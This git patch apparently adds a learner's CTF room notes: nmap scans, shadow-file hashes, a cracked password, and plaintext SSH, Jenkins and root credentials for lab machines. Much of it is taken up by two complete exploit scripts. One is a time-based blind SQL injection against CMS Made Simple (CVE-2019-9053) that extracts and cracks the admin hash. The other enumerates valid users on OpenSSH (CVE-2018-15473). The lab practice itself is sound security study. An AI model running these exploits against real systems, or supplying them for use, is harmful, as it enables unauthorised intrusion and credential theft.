From 71dd1dc672fb230428ed3662f59b552eac70d215 Mon Sep 17 00:00:00 2001
From: Raghuram Subramani <raghus2247@gmail.com>
Date: Tue, 1 Mar 2022 14:47:08 +0530
Subject: add rooms

---
 .gitattributes                    |   1 +
 .gitignore                        |   1 +
 CCPenTesting/nmap/finalbox        |  17 ++++
 CCPenTesting/nmap/initial         |  11 +++
 Overpass2Hacked/README.md         |   2 +
 Overpass2Hacked/cracked.txt       |   1 +
 Overpass2Hacked/etc-shadow        |   5 +
 Overpass2Hacked/etc-shadow.txt    |   5 +
 Overpass2Hacked/hash.txt          |   1 +
 Overpass2Hacked/nmap/first        |  20 ++++
 Overpass2Hacked/overpass2.pcapng  | Bin 0 -> 3905904 bytes
 SimpleCTF/ForMitch.txt            |   1 +
 SimpleCTF/README.md               |   7 ++
 SimpleCTF/exploit.py              | 186 ++++++++++++++++++++++++++++++++++++++
 SimpleCTF/nmap/initial            |  35 +++++++
 adventofcyber3/day4/README.md     |   3 +
 adventofcyber3/day4/passwords.txt |  15 +++
 internal/45939.py                 |  65 +++++++++++++
 internal/README.md                |  27 ++++++
 internal/allPort.gnmap            |   0
 internal/allPort.nmap             |   0
 internal/allPort.xml              |  25 +++++
 internal/initial.gnmap            |   4 +
 internal/initial.nmap             |  17 ++++
 internal/initial.xml              |  44 +++++++++
 internal/nmap/initial.nmap        |  17 ++++
 internal/php-reverse-shell.php    |  92 +++++++++++++++++++
 27 files changed, 602 insertions(+)
 create mode 100644 .gitattributes
 create mode 100644 .gitignore
 create mode 100755 CCPenTesting/nmap/finalbox
 create mode 100755 CCPenTesting/nmap/initial
 create mode 100755 Overpass2Hacked/README.md
 create mode 100755 Overpass2Hacked/cracked.txt
 create mode 100755 Overpass2Hacked/etc-shadow
 create mode 100755 Overpass2Hacked/etc-shadow.txt
 create mode 100755 Overpass2Hacked/hash.txt
 create mode 100755 Overpass2Hacked/nmap/first
 create mode 100755 Overpass2Hacked/overpass2.pcapng
 create mode 100644 SimpleCTF/ForMitch.txt
 create mode 100644 SimpleCTF/README.md
 create mode 100644 SimpleCTF/exploit.py
 create mode 100644 SimpleCTF/nmap/initial
 create mode 100644 adventofcyber3/day4/README.md
 create mode 100644 adventofcyber3/day4/passwords.txt
 create mode 100644 internal/45939.py
 create mode 100644 internal/README.md
 create mode 100644 internal/allPort.gnmap
 create mode 100644 internal/allPort.nmap
 create mode 100644 internal/allPort.xml
 create mode 100644 internal/initial.gnmap
 create mode 100644 internal/initial.nmap
 create mode 100644 internal/initial.xml
 create mode 100644 internal/nmap/initial.nmap
 create mode 100644 internal/php-reverse-shell.php

diff --git a/.gitattributes b/.gitattributes
new file mode 100644
index 0000000..38c0823
--- /dev/null
+++ b/.gitattributes
@@ -0,0 +1 @@
+*.vmem filter=lfs diff=lfs merge=lfs -text
diff --git a/.gitignore b/.gitignore
new file mode 100644
index 0000000..a86311d
--- /dev/null
+++ b/.gitignore
@@ -0,0 +1 @@
+compromyse.ovpn
diff --git a/CCPenTesting/nmap/finalbox b/CCPenTesting/nmap/finalbox
new file mode 100755
index 0000000..03ad7dc
--- /dev/null
+++ b/CCPenTesting/nmap/finalbox
@@ -0,0 +1,17 @@
+# Nmap 7.80 scan initiated Fri Feb 25 09:59:30 2022 as: nmap -sC -sV -oN nmap/finalbox 10.10.235.31
+Nmap scan report for 10.10.235.31
+Host is up (0.18s latency).
+Not shown: 998 closed ports
+PORT   STATE SERVICE VERSION
+22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
+| ssh-hostkey: 
+|   2048 12:96:a6:1e:81:73:ae:17:4c:e1:7c:63:78:3c:71:1c (RSA)
+|   256 6d:9c:f2:07:11:d2:aa:19:99:90:bb:ec:6b:a1:53:77 (ECDSA)
+|_  256 0e:a5:fa:ce:f2:ad:e6:fa:99:f3:92:5f:87:bb:ba:f4 (ED25519)
+80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
+|_http-server-header: Apache/2.4.18 (Ubuntu)
+|_http-title: Apache2 Ubuntu Default Page: It works
+Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+# Nmap done at Fri Feb 25 09:59:57 2022 -- 1 IP address (1 host up) scanned in 27.09 seconds
diff --git a/CCPenTesting/nmap/initial b/CCPenTesting/nmap/initial
new file mode 100755
index 0000000..159e74a
--- /dev/null
+++ b/CCPenTesting/nmap/initial
@@ -0,0 +1,11 @@
+# Nmap 7.80 scan initiated Fri Feb 25 08:39:09 2022 as: nmap -sC -sV -oN nmap/initial 10.10.52.126
+Nmap scan report for 10.10.52.126
+Host is up (0.19s latency).
+Not shown: 999 closed ports
+PORT   STATE SERVICE VERSION
+80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
+|_http-server-header: Apache/2.4.18 (Ubuntu)
+|_http-title: Apache2 Ubuntu Default Page: It works
+
+Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+# Nmap done at Fri Feb 25 08:39:39 2022 -- 1 IP address (1 host up) scanned in 29.87 seconds
diff --git a/Overpass2Hacked/README.md b/Overpass2Hacked/README.md
new file mode 100755
index 0000000..9b033d1
--- /dev/null
+++ b/Overpass2Hacked/README.md
@@ -0,0 +1,2 @@
+attacker ip `192.168.170.145`
+dest ip `192.168.170.159`
\ No newline at end of file
diff --git a/Overpass2Hacked/cracked.txt b/Overpass2Hacked/cracked.txt
new file mode 100755
index 0000000..5ddcbe5
--- /dev/null
+++ b/Overpass2Hacked/cracked.txt
@@ -0,0 +1 @@
+6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed:1c362db832f3f864c8c2fe05f2002a05:november16
diff --git a/Overpass2Hacked/etc-shadow b/Overpass2Hacked/etc-shadow
new file mode 100755
index 0000000..270d361
--- /dev/null
+++ b/Overpass2Hacked/etc-shadow
@@ -0,0 +1,5 @@
+james:$6$7GS5e.yv$HqIH5MthpGWpczr3MnwDHlED8gbVSHt7ma8yxzBM8LuBReDV5e1Pu/VuRskugt1Ckul/SKGX.5PyMpzAYo3Cg/:18464:0:99999:7:::
+paradox:$6$oRXQu43X$WaAj3Z/4sEPV1mJdHsyJkIZm1rjjnNxrY5c8GElJIjG7u36xSgMGwKA2woDIFudtyqY37YCyukiHJPhi4IU7H0:18464:0:99999:7:::
+szymex:$6$B.EnuXiO$f/u00HosZIO3UQCEJplazoQtH8WJjSX/ooBjwmYfEOTcqCAlMjeFIgYWqR5Aj2vsfRyf6x1wXxKitcPUjcXlX/:18464:0:99999:7:::
+bee:$6$.SqHrp6z$B4rWPi0Hkj0gbQMFujz1KHVs9VrSFu7AU9CxWrZV7GzH05tYPL1xRzUJlFHbyp0K9TAeY1M6niFseB9VLBWSo0:18464:0:99999:7:::
+muirland:$6$SWybS8o2$9diveQinxy8PJQnGQQWbTNKeb2AiSp.i8KznuAjYbqI3q04Rf5hjHPer3weiC.2MrOj2o1Sw/fd2cu0kC6dUP.:18464:0:99999:7:::
diff --git a/Overpass2Hacked/etc-shadow.txt b/Overpass2Hacked/etc-shadow.txt
new file mode 100755
index 0000000..270d361
--- /dev/null
+++ b/Overpass2Hacked/etc-shadow.txt
@@ -0,0 +1,5 @@
+james:$6$7GS5e.yv$HqIH5MthpGWpczr3MnwDHlED8gbVSHt7ma8yxzBM8LuBReDV5e1Pu/VuRskugt1Ckul/SKGX.5PyMpzAYo3Cg/:18464:0:99999:7:::
+paradox:$6$oRXQu43X$WaAj3Z/4sEPV1mJdHsyJkIZm1rjjnNxrY5c8GElJIjG7u36xSgMGwKA2woDIFudtyqY37YCyukiHJPhi4IU7H0:18464:0:99999:7:::
+szymex:$6$B.EnuXiO$f/u00HosZIO3UQCEJplazoQtH8WJjSX/ooBjwmYfEOTcqCAlMjeFIgYWqR5Aj2vsfRyf6x1wXxKitcPUjcXlX/:18464:0:99999:7:::
+bee:$6$.SqHrp6z$B4rWPi0Hkj0gbQMFujz1KHVs9VrSFu7AU9CxWrZV7GzH05tYPL1xRzUJlFHbyp0K9TAeY1M6niFseB9VLBWSo0:18464:0:99999:7:::
+muirland:$6$SWybS8o2$9diveQinxy8PJQnGQQWbTNKeb2AiSp.i8KznuAjYbqI3q04Rf5hjHPer3weiC.2MrOj2o1Sw/fd2cu0kC6dUP.:18464:0:99999:7:::
diff --git a/Overpass2Hacked/hash.txt b/Overpass2Hacked/hash.txt
new file mode 100755
index 0000000..6b26fdc
--- /dev/null
+++ b/Overpass2Hacked/hash.txt
@@ -0,0 +1 @@
+6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed:1c362db832f3f864c8c2fe05f2002a05
diff --git a/Overpass2Hacked/nmap/first b/Overpass2Hacked/nmap/first
new file mode 100755
index 0000000..48f87c3
--- /dev/null
+++ b/Overpass2Hacked/nmap/first
@@ -0,0 +1,20 @@
+# Nmap 7.80 scan initiated Fri Feb 25 07:48:08 2022 as: nmap -sC -sV -oN nmap/first 10.10.13.215
+Nmap scan report for 10.10.13.215
+Host is up (0.19s latency).
+Not shown: 997 closed ports
+PORT     STATE SERVICE VERSION
+22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
+| ssh-hostkey: 
+|   2048 e4:3a:be:ed:ff:a7:02:d2:6a:d6:d0:bb:7f:38:5e:cb (RSA)
+|   256 fc:6f:22:c2:13:4f:9c:62:4f:90:c9:3a:7e:77:d6:d4 (ECDSA)
+|_  256 15:fd:40:0a:65:59:a9:b5:0e:57:1b:23:0a:96:63:05 (ED25519)
+80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
+|_http-server-header: Apache/2.4.29 (Ubuntu)
+|_http-title: LOL Hacked
+2222/tcp open  ssh     OpenSSH 8.2p1 Debian 4 (protocol 2.0)
+| ssh-hostkey: 
+|_  2048 a2:a6:d2:18:79:e3:b0:20:a2:4f:aa:b6:ac:2e:6b:f2 (RSA)
+Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+# Nmap done at Fri Feb 25 07:49:16 2022 -- 1 IP address (1 host up) scanned in 68.23 seconds
diff --git a/Overpass2Hacked/overpass2.pcapng b/Overpass2Hacked/overpass2.pcapng
new file mode 100755
index 0000000..5ec787d
Binary files /dev/null and b/Overpass2Hacked/overpass2.pcapng differ
diff --git a/SimpleCTF/ForMitch.txt b/SimpleCTF/ForMitch.txt
new file mode 100644
index 0000000..596c727
--- /dev/null
+++ b/SimpleCTF/ForMitch.txt
@@ -0,0 +1 @@
+Dammit man... you'te the worst dev i've seen. You set the same pass for the system user, and the password is so weak... i cracked it in seconds. Gosh... what a mess!
diff --git a/SimpleCTF/README.md b/SimpleCTF/README.md
new file mode 100644
index 0000000..b0465a6
--- /dev/null
+++ b/SimpleCTF/README.md
@@ -0,0 +1,7 @@
+IP address >`10.10.73.108`
+
+SSH > 
+```
+mitch
+secret
+```
\ No newline at end of file
diff --git a/SimpleCTF/exploit.py b/SimpleCTF/exploit.py
new file mode 100644
index 0000000..260e4e7
--- /dev/null
+++ b/SimpleCTF/exploit.py
@@ -0,0 +1,186 @@
+#!/usr/bin/env python3
+# Exploit Title: Unauthenticated SQL Injection on CMS Made Simple <= 2.2.9
+# Date: 30-03-2019
+# Exploit Author: Daniele Scanu @ Certimeter Group
+# Vendor Homepage: https://www.cmsmadesimple.org/
+# Software Link: https://www.cmsmadesimple.org/downloads/cmsms/
+# Version: <= 2.2.9
+# Tested on: Ubuntu 18.04 LTS
+# CVE : CVE-2019-9053
+
+import requests
+from termcolor import colored
+import time
+from termcolor import cprint
+import optparse
+import hashlib
+
+parser = optparse.OptionParser()
+parser.add_option('-u', '--url', action="store", dest="url", help="Base target uri (ex. http://10.10.10.100/cms)")
+parser.add_option('-w', '--wordlist', action="store", dest="wordlist", help="Wordlist for crack admin password")
+parser.add_option('-c', '--crack', action="store_true", dest="cracking", help="Crack password with wordlist", default=False)
+
+options, args = parser.parse_args()
+if not options.url:
+    print "[+] Specify an url target"
+    print "[+] Example usage (no cracking password): exploit.py -u http://target-uri"
+    print "[+] Example usage (with cracking password): exploit.py -u http://target-uri --crack -w /path-wordlist"
+    print "[+] Setup the variable TIME with an appropriate time, because this sql injection is a time based."
+    exit()
+
+url_vuln = options.url + '/moduleinterface.php?mact=News,m1_,default,0'
+session = requests.Session()
+dictionary = '1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM@._-$'
+flag = True
+password = ""
+temp_password = ""
+TIME = 1
+db_name = ""
+output = ""
+email = ""
+
+salt = ''
+wordlist = ""
+if options.wordlist:
+    wordlist += options.wordlist
+
+def crack_password():
+    global password
+    global output
+    global wordlist
+    global salt
+    dict = open(wordlist)
+    for line in dict.readlines():
+        line = line.replace("\n", "")
+        beautify_print_try(line)
+        if hashlib.md5(str(salt) + line).hexdigest() == password:
+            output += "\n[+] Password cracked: " + line
+            break
+    dict.close()
+
+def beautify_print_try(value):
+    global output
+    print "\033c"
+    cprint(output,'green', attrs=['bold'])
+    cprint('[*] Try: ' + value, 'red', attrs=['bold'])
+
+def beautify_print():
+    global output
+    print "\033c"
+    cprint(output,'green', attrs=['bold'])
+
+def dump_salt():
+    global flag
+    global salt
+    global output
+    ord_salt = ""
+    ord_salt_temp = ""
+    while flag:
+        flag = False
+        for i in range(0, len(dictionary)):
+            temp_salt = salt + dictionary[i]
+            ord_salt_temp = ord_salt + hex(ord(dictionary[i]))[2:]
+            beautify_print_try(temp_salt)
+            payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_siteprefs+where+sitepref_value+like+0x" + ord_salt_temp + "25+and+sitepref_name+like+0x736974656d61736b)+--+"
+            url = url_vuln + "&m1_idlist=" + payload
+            start_time = time.time()
+            r = session.get(url)
+            elapsed_time = time.time() - start_time
+            if elapsed_time >= TIME:
+                flag = True
+                break
+        if flag:
+            salt = temp_salt
+            ord_salt = ord_salt_temp
+    flag = True
+    output += '\n[+] Salt for password found: ' + salt
+
+def dump_password():
+    global flag
+    global password
+    global output
+    ord_password = ""
+    ord_password_temp = ""
+    while flag:
+        flag = False
+        for i in range(0, len(dictionary)):
+            temp_password = password + dictionary[i]
+            ord_password_temp = ord_password + hex(ord(dictionary[i]))[2:]
+            beautify_print_try(temp_password)
+            payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_users"
+            payload += "+where+password+like+0x" + ord_password_temp + "25+and+user_id+like+0x31)+--+"
+            url = url_vuln + "&m1_idlist=" + payload
+            start_time = time.time()
+            r = session.get(url)
+            elapsed_time = time.time() - start_time
+            if elapsed_time >= TIME:
+                flag = True
+                break
+        if flag:
+            password = temp_password
+            ord_password = ord_password_temp
+    flag = True
+    output += '\n[+] Password found: ' + password
+
+def dump_username():
+    global flag
+    global db_name
+    global output
+    ord_db_name = ""
+    ord_db_name_temp = ""
+    while flag:
+        flag = False
+        for i in range(0, len(dictionary)):
+            temp_db_name = db_name + dictionary[i]
+            ord_db_name_temp = ord_db_name + hex(ord(dictionary[i]))[2:]
+            beautify_print_try(temp_db_name)
+            payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_users+where+username+like+0x" + ord_db_name_temp + "25+and+user_id+like+0x31)+--+"
+            url = url_vuln + "&m1_idlist=" + payload
+            start_time = time.time()
+            r = session.get(url)
+            elapsed_time = time.time() - start_time
+            if elapsed_time >= TIME:
+                flag = True
+                break
+        if flag:
+            db_name = temp_db_name
+            ord_db_name = ord_db_name_temp
+    output += '\n[+] Username found: ' + db_name
+    flag = True
+
+def dump_email():
+    global flag
+    global email
+    global output
+    ord_email = ""
+    ord_email_temp = ""
+    while flag:
+        flag = False
+        for i in range(0, len(dictionary)):
+            temp_email = email + dictionary[i]
+            ord_email_temp = ord_email + hex(ord(dictionary[i]))[2:]
+            beautify_print_try(temp_email)
+            payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_users+where+email+like+0x" + ord_email_temp + "25+and+user_id+like+0x31)+--+"
+            url = url_vuln + "&m1_idlist=" + payload
+            start_time = time.time()
+            r = session.get(url)
+            elapsed_time = time.time() - start_time
+            if elapsed_time >= TIME:
+                flag = True
+                break
+        if flag:
+            email = temp_email
+            ord_email = ord_email_temp
+    output += '\n[+] Email found: ' + email
+    flag = True
+
+dump_salt()
+dump_username()
+dump_email()
+dump_password()
+
+if options.cracking:
+    print colored("[*] Now try to crack password")
+    crack_password()
+
+beautify_print()
\ No newline at end of file
diff --git a/SimpleCTF/nmap/initial b/SimpleCTF/nmap/initial
new file mode 100644
index 0000000..3ae0e7d
--- /dev/null
+++ b/SimpleCTF/nmap/initial
@@ -0,0 +1,35 @@
+# Nmap 7.80 scan initiated Mon Feb 28 21:34:09 2022 as: nmap -sC -sV -oN nmap/initial 10.10.73.108
+Nmap scan report for 10.10.73.108
+Host is up (0.19s latency).
+Not shown: 997 filtered ports
+PORT     STATE SERVICE VERSION
+21/tcp   open  ftp     vsftpd 3.0.3
+| ftp-anon: Anonymous FTP login allowed (FTP code 230)
+|_Can't get directory listing: TIMEOUT
+| ftp-syst: 
+|   STAT: 
+| FTP server status:
+|      Connected to ::ffff:10.17.36.210
+|      Logged in as ftp
+|      TYPE: ASCII
+|      No session bandwidth limit
+|      Session timeout in seconds is 300
+|      Control connection is plain text
+|      Data connections will be plain text
+|      At session startup, client count was 3
+|      vsFTPd 3.0.3 - secure, fast, stable
+|_End of status
+80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
+| http-robots.txt: 2 disallowed entries 
+|_/ /openemr-5_0_1_3 
+|_http-server-header: Apache/2.4.18 (Ubuntu)
+|_http-title: Apache2 Ubuntu Default Page: It works
+2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
+| ssh-hostkey: 
+|   2048 29:42:69:14:9e:ca:d9:17:98:8c:27:72:3a:cd:a9:23 (RSA)
+|   256 9b:d1:65:07:51:08:00:61:98:de:95:ed:3a:e3:81:1c (ECDSA)
+|_  256 12:65:1b:61:cf:4d:e5:75:fe:f4:e8:d4:6e:10:2a:f6 (ED25519)
+Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
+
+Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+# Nmap done at Mon Feb 28 21:35:07 2022 -- 1 IP address (1 host up) scanned in 57.41 seconds
diff --git a/adventofcyber3/day4/README.md b/adventofcyber3/day4/README.md
new file mode 100644
index 0000000..83d8114
--- /dev/null
+++ b/adventofcyber3/day4/README.md
@@ -0,0 +1,3 @@
+```
+password > cookie
+```
diff --git a/adventofcyber3/day4/passwords.txt b/adventofcyber3/day4/passwords.txt
new file mode 100644
index 0000000..6f45b3a
--- /dev/null
+++ b/adventofcyber3/day4/passwords.txt
@@ -0,0 +1,15 @@
+christmas
+elves!
+santa
+festive
+joy123
+myrrh!
+yuletide
+presents
+candy
+tidings
+cookie
+cookies
+biscuits!
+snowball
+snowball123
diff --git a/internal/45939.py b/internal/45939.py
new file mode 100644
index 0000000..76298e3
--- /dev/null
+++ b/internal/45939.py
@@ -0,0 +1,65 @@
+#!/usr/bin/env python2
+# CVE-2018-15473 SSH User Enumeration by Leap Security (@LeapSecurity) https://leapsecurity.io
+# Credits: Matthew Daley, Justin Gardner, Lee David Painter
+
+import argparse, logging, paramiko, socket, sys, os
+
+class InvalidUsername(Exception):
+    pass
+
+# malicious function to malform packet
+def add_boolean(*args, **kwargs):
+    pass
+
+# function that'll be overwritten to malform the packet
+old_service_accept = paramiko.auth_handler.AuthHandler._client_handler_table[
+        paramiko.common.MSG_SERVICE_ACCEPT]
+
+# malicious function to overwrite MSG_SERVICE_ACCEPT handler
+def service_accept(*args, **kwargs):
+    paramiko.message.Message.add_boolean = add_boolean
+    return old_service_accept(*args, **kwargs)
+
+# call when username was invalid
+def invalid_username(*args, **kwargs):
+    raise InvalidUsername()
+
+# assign functions to respective handlers
+paramiko.auth_handler.AuthHandler._client_handler_table[paramiko.common.MSG_SERVICE_ACCEPT] = service_accept
+paramiko.auth_handler.AuthHandler._client_handler_table[paramiko.common.MSG_USERAUTH_FAILURE] = invalid_username
+
+# perform authentication with malicious packet and username
+def check_user(username):
+    sock = socket.socket()
+    sock.connect((args.target, args.port))
+    transport = paramiko.transport.Transport(sock)
+
+    try:
+        transport.start_client()
+    except paramiko.ssh_exception.SSHException:
+        print '[!] Failed to negotiate SSH transport'
+        sys.exit(2)
+
+    try:
+        transport.auth_publickey(username, paramiko.RSAKey.generate(2048))
+    except InvalidUsername:
+        print "[-] {} is an invalid username".format(username)
+        sys.exit(3)
+    except paramiko.ssh_exception.AuthenticationException:
+        print "[+] {} is a valid username".format(username)
+
+# remove paramiko logging
+logging.getLogger('paramiko.transport').addHandler(logging.NullHandler())
+
+parser = argparse.ArgumentParser(description='SSH User Enumeration by Leap Security (@LeapSecurity)')
+parser.add_argument('target', help="IP address of the target system")
+parser.add_argument('-p', '--port', default=22, help="Set port of SSH service")
+parser.add_argument('username', help="Username to check for validity.")
+
+if len(sys.argv) == 1:
+    parser.print_help()
+    sys.exit(1)
+
+args = parser.parse_args()
+
+check_user(args.username)
diff --git a/internal/README.md b/internal/README.md
new file mode 100644
index 0000000..9330910
--- /dev/null
+++ b/internal/README.md
@@ -0,0 +1,27 @@
+IP > `10.10.154.125`
+
+```
+admin: my2boys
+```
+
+```
+aubreanna:bubb13guM!@#123
+```
+
+```
+Internal Jenkins service is running on 172.17.0.2:8080
+```
+```bash
+ssh -f -g -L 5053:192.168.60.101:502 user@192.168.60.100 -N
+```
+
+Jenkins
+```
+admin: spongebob
+```
+
+root pass
+
+```
+root:tr0ub13guM!@#123
+```
diff --git a/internal/allPort.gnmap b/internal/allPort.gnmap
new file mode 100644
index 0000000..e69de29
diff --git a/internal/allPort.nmap b/internal/allPort.nmap
new file mode 100644
index 0000000..e69de29
diff --git a/internal/allPort.xml b/internal/allPort.xml
new file mode 100644
index 0000000..1197b8e
--- /dev/null
+++ b/internal/allPort.xml
@@ -0,0 +1,25 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE nmaprun>
+<?xml-stylesheet href="file:///usr/bin/../share/nmap/nmap.xsl" type="text/xsl"?>
+<!-- Nmap 7.80 scan initiated Tue Mar  1 12:42:01 2022 as: nmap -p- -oA allPort 10.10.252.197 -->
+<nmaprun scanner="nmap" args="nmap -p- -oA allPort 10.10.252.197" start="1646118721" startstr="Tue Mar  1 12:42:01 2022" version="7.80" xmloutputversion="1.04">
+<scaninfo type="connect" protocol="tcp" numservices="65535" services="1-65535"/>
+<verbose level="0"/>
+<debugging level="0"/>
+<taskprogress task="Connect Scan" time="1646118721" percent="0.10"/>
+<taskprogress task="Connect Scan" time="1646118722" percent="0.10"/>
+<taskprogress task="Connect Scan" time="1646118722" percent="0.16"/>
+<taskprogress task="Connect Scan" time="1646118754" percent="2.22" remaining="1455" etc="1646120209"/>
+<taskprogress task="Connect Scan" time="1646118763" percent="2.62" remaining="1561" etc="1646120323"/>
+<taskprogress task="Connect Scan" time="1646118763" percent="2.64" remaining="1551" etc="1646120314"/>
+<taskprogress task="Connect Scan" time="1646118839" percent="13.80" remaining="738" etc="1646119576"/>
+<taskprogress task="Connect Scan" time="1646119052" percent="43.55" remaining="430" etc="1646119481"/>
+<taskprogress task="Connect Scan" time="1646119100" percent="50.63" remaining="370" etc="1646119470"/>
+<taskprogress task="Connect Scan" time="1646119319" percent="73.69" remaining="214" etc="1646119532"/>
+<taskprogress task="Connect Scan" time="1646119319" percent="73.69" remaining="214" etc="1646119532"/>
+<taskprogress task="Connect Scan" time="1646119319" percent="73.69" remaining="214" etc="1646119532"/>
+<taskprogress task="Connect Scan" time="1646119319" percent="73.70" remaining="214" etc="1646119532"/>
+<taskprogress task="Connect Scan" time="1646119319" percent="73.70" remaining="214" etc="1646119532"/>
+<taskprogress task="Connect Scan" time="1646119409" percent="74.54" remaining="235" etc="1646119644"/>
+<taskprogress task="Connect Scan" time="1646119936" percent="79.56" remaining="313" etc="1646120248"/>
+<taskprogress task="Connect Scan" time="1646120740" percent="87.02" remaining="302" etc="1646121041"/>
diff --git a/internal/initial.gnmap b/internal/initial.gnmap
new file mode 100644
index 0000000..06f775b
--- /dev/null
+++ b/internal/initial.gnmap
@@ -0,0 +1,4 @@
+# Nmap 7.80 scan initiated Tue Mar  1 12:13:41 2022 as: nmap -sC -sV -oA nmap/initial 10.10.252.197
+Host: 10.10.252.197 (internal.thm)	Status: Up
+Host: 10.10.252.197 (internal.thm)	Ports: 22/open/tcp//ssh//OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)/, 80/open/tcp//http//Apache httpd 2.4.29 ((Ubuntu))/	Ignored State: closed (998)
+# Nmap done at Tue Mar  1 12:14:16 2022 -- 1 IP address (1 host up) scanned in 34.54 seconds
diff --git a/internal/initial.nmap b/internal/initial.nmap
new file mode 100644
index 0000000..e199a01
--- /dev/null
+++ b/internal/initial.nmap
@@ -0,0 +1,17 @@
+# Nmap 7.80 scan initiated Tue Mar  1 12:13:41 2022 as: nmap -sC -sV -oA nmap/initial 10.10.252.197
+Nmap scan report for internal.thm (10.10.252.197)
+Host is up (0.18s latency).
+Not shown: 998 closed ports
+PORT   STATE SERVICE VERSION
+22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
+| ssh-hostkey: 
+|   2048 6e:fa:ef:be:f6:5f:98:b9:59:7b:f7:8e:b9:c5:62:1e (RSA)
+|   256 ed:64:ed:33:e5:c9:30:58:ba:23:04:0d:14:eb:30:e9 (ECDSA)
+|_  256 b0:7f:7f:7b:52:62:62:2a:60:d4:3d:36:fa:89:ee:ff (ED25519)
+80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
+|_http-server-header: Apache/2.4.29 (Ubuntu)
+|_http-title: Apache2 Ubuntu Default Page: It works
+Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+# Nmap done at Tue Mar  1 12:14:16 2022 -- 1 IP address (1 host up) scanned in 34.54 seconds
diff --git a/internal/initial.xml b/internal/initial.xml
new file mode 100644
index 0000000..f9ad390
--- /dev/null
+++ b/internal/initial.xml
@@ -0,0 +1,44 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE nmaprun>
+<?xml-stylesheet href="file:///usr/bin/../share/nmap/nmap.xsl" type="text/xsl"?>
+<!-- Nmap 7.80 scan initiated Tue Mar  1 12:13:41 2022 as: nmap -sC -sV -oA nmap/initial 10.10.252.197 -->
+<nmaprun scanner="nmap" args="nmap -sC -sV -oA nmap/initial 10.10.252.197" start="1646117021" startstr="Tue Mar  1 12:13:41 2022" version="7.80" xmloutputversion="1.04">
+<scaninfo type="connect" protocol="tcp" numservices="1000" services="1,3-4,6-7,9,13,17,19-26,30,32-33,37,42-43,49,53,70,79-85,88-90,99-100,106,109-111,113,119,125,135,139,143-144,146,161,163,179,199,211-212,222,254-256,259,264,280,301,306,311,340,366,389,406-407,416-417,425,427,443-445,458,464-465,481,497,500,512-515,524,541,543-545,548,554-555,563,587,593,616-617,625,631,636,646,648,666-668,683,687,691,700,705,711,714,720,722,726,749,765,777,783,787,800-801,808,843,873,880,888,898,900-903,911-912,981,987,990,992-993,995,999-1002,1007,1009-1011,1021-1100,1102,1104-1108,1110-1114,1117,1119,1121-1124,1126,1130-1132,1137-1138,1141,1145,1147-1149,1151-1152,1154,1163-1166,1169,1174-1175,1183,1185-1187,1192,1198-1199,1201,1213,1216-1218,1233-1234,1236,1244,1247-1248,1259,1271-1272,1277,1287,1296,1300-1301,1309-1311,1322,1328,1334,1352,1417,1433-1434,1443,1455,1461,1494,1500-1501,1503,1521,1524,1533,1556,1580,1583,1594,1600,1641,1658,1666,1687-1688,1700,1717-1721,1723,1755,1761,1782-1783,1801,1805,1812,1839-1840,1862-1864,1875,1900,1914,1935,1947,1971-1972,1974,1984,1998-2010,2013,2020-2022,2030,2033-2035,2038,2040-2043,2045-2049,2065,2068,2099-2100,2103,2105-2107,2111,2119,2121,2126,2135,2144,2160-2161,2170,2179,2190-2191,2196,2200,2222,2251,2260,2288,2301,2323,2366,2381-2383,2393-2394,2399,2401,2492,2500,2522,2525,2557,2601-2602,2604-2605,2607-2608,2638,2701-2702,2710,2717-2718,2725,2800,2809,2811,2869,2875,2909-2910,2920,2967-2968,2998,3000-3001,3003,3005-3007,3011,3013,3017,3030-3031,3052,3071,3077,3128,3168,3211,3221,3260-3261,3268-3269,3283,3300-3301,3306,3322-3325,3333,3351,3367,3369-3372,3389-3390,3404,3476,3493,3517,3527,3546,3551,3580,3659,3689-3690,3703,3737,3766,3784,3800-3801,3809,3814,3826-3828,3851,3869,3871,3878,3880,3889,3905,3914,3918,3920,3945,3971,3986,3995,3998,4000-4006,4045,4111,4125-4126,4129,4224,4242,4279,4321,4343,4443-4446,4449,4550,4567,4662,4848,4899-4900,4998,5000-5004,5009,5030,5033,5050-5051,5054,5060-5061,5080,5087,5100-5102,5120,5190,5200,5214,5221-5222,5225-5226,5269,5280,5298,5357,5405,5414,5431-5432,5440,5500,5510,5544,5550,5555,5560,5566,5631,5633,5666,5678-5679,5718,5730,5800-5802,5810-5811,5815,5822,5825,5850,5859,5862,5877,5900-5904,5906-5907,